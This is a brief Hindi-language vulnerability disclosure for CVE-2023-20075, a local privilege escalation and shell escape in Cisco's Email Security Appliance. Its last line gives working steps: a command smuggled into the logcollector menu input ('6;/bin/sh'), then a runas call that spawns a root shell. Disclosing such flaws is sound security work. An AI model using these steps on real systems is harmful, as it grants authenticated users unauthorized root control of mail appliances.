
Cisco Email Security Appliance: स्थानीय विशेषाधिकार वृद्धि और शेल पलायन
सुरक्षा शोधकर्ता: ly1g3, ly1g3[at]tuta.io
GPG फिंगरप्रिंट: https://keys.openpgp.org/vks/v1/by-fingerprint/5FE85CE4E8F675F5ABD2C0A33CE8BE447ED6D586
अवलोकन: स्थानीय विशेषाधिकार वृद्धि और शेल पलायन
CVE: CVE-2023-20075
समयरेखा:
ESA (Cisco सुरक्षित ईमेल)
एक प्रमाणित उपयोगकर्ता जिसके पास cli तक पहुंच है, वह रूट तक विशेषाधिकार बढ़ा सकता है और मनमाना कोड निष्पादित कर सकता है
logcollector चलाएं3 दबाएं6;/bin/sh/data/release/phoebe-14*/bin/runas 0 /bin/sh